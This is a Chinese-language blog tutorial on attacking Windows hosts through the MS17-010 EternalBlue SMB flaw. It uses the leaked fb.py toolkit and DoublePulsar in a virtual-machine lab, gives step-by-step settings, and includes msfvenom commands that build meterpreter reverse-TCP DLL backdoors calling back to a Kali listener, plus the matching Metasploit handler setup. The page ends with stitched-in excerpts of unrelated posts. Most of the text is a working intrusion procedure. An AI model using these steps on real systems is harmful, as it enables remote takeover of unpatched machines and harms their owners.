微軟EternalBlue永恆之藍漏洞攻擊測試

2021-08-15 21:22:55 字數 2389 閱讀 3865

微軟ms17-010

理論:smbv1 漏洞攻擊,445埠。

攻擊資源:攻擊工具包 點我

攻擊者系統:windows 7 ultimate (x64) 點我

受害者系統:windows 7 ultimate (x64) 點我,winxp,win2008,win2003均可。 點我

輔助攻擊用系統:kali 點我

將c:\python26新增到環境變數path中。

將攻擊工具包拖入虛擬機器,或上傳到虛擬機器。解壓後,裡面有個windows的目錄,複製出來到虛擬機器的c盤。

新建 listeningposts 目錄。

2、受害者環境部署:

受害者系統自選乙個就行,隨意,安裝後,需要和攻擊者系統能互相ping通。

3、攻擊操作:

攻擊者在cmd下執行fb.py

target ip就是受害者ip

callbackip就是攻擊者的ip

use redirection輸入no

base log 輸入 c:\logs或輸入no(是否有日誌記錄,這個是自願)

接著輸入0,新建了乙個攻擊專案。

專案名稱隨意(英文以外名字可能會報錯)。

然後輸入yes確認

其他的直接回車就行了。英文可以用有道翻譯。

use eternalblue

問你是否要setting。輸入yes

下面的回車就好,都是預設好的配置。

target system,如實選擇受害者的系統。

mode選擇fb,即輸入1。

剩下的就是yes和回車了。

(失敗的原因:

1、防火牆的保護。

2、防毒程式的保護。

3、網路通訊異常。

4、人為操作失誤。)

部署輔助攻擊系統:

1、部署kali,可以和攻擊者正常通訊即可。

2、攻擊者安裝xshell。

4、利用kali 的msf生成後門檔案。(lport埠引數隨意,只要不衝突就行)

如果受害者是winxp 32位:

msfvenom -p windows/meterpreter/reverse_tcp lhost=kali系統的ip lport=19999 -f dll > /tmp/attack.dll

如果受害者是win7 64位:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=kali的ip lport=5555 -f dll > /tmp/attack.dll

確認xshell已經連線到了kali,

在xshell輸入:sz /opt/attack.dll

選擇儲存在攻擊者系統的c盤根目錄下即可。

xshell下:

msfconsole

use exploit/multi/handler //啟用了監聽模組

受害者是winxp的時候:

( set payload windows/meterpreter/reverse_tcp

set lhost kali的ip

set lport 19999

show options //看一眼配置

run //開啟了監聽

)受害者是win7 64位時:

(msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf exploit(handler) > set lhost kali的ip

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

)在攻擊者的cmd下:

use doublepulsar

作業系統選擇目標的。

選擇rundll

路徑輸入:c:\attack.dll

其他各種回車確認。

可以看到,xshell連線的kali,收到了會話連線。

可以輸入whoami或者dir來驗證一下。

kali下直接實現攻擊利用:

360提供了懶人模式的nsa攻擊自動檢測和防護工具,免安裝。點我

ms09-050:

ms10-061:

ms14-068:

ms17-010:

微軟EternalBlue永恆之藍漏洞攻擊測試

微軟ms17 010 理論 smbv1 漏洞攻擊,445埠。攻擊資源 攻擊工具包 點我 攻擊者系統 windows 7 ultimate x64 點我 受害者系統 windows 7 ultimate x64 點我,winxp,win2008,win2003均可。點我 輔助攻擊用系統 kali 點我...

永恆之藍 EternalBlue 漏洞利用例項

1 公升級kali rolling a 修改更新源 vim etc apt sources.list,只保留官方更新源 deb kali rolling main non free contrib 將其他更新源注釋掉 b 更新 apt get update apt get upgrade git c...

HIhoder 永恆遊戲

時間限制 20000ms 單點時限 1000ms 記憶體限制 256mb 很久很久以前,當rowdark還是個善良的魔法師時,他在乙個n個點m條邊的無向圖上玩乙個遊戲。開始時他在一些點上放些石子。每次rowdark選擇乙個點a,要求點a上的石子數大於等於鄰居點個數。然後對a的每個鄰居b,將a上的乙個...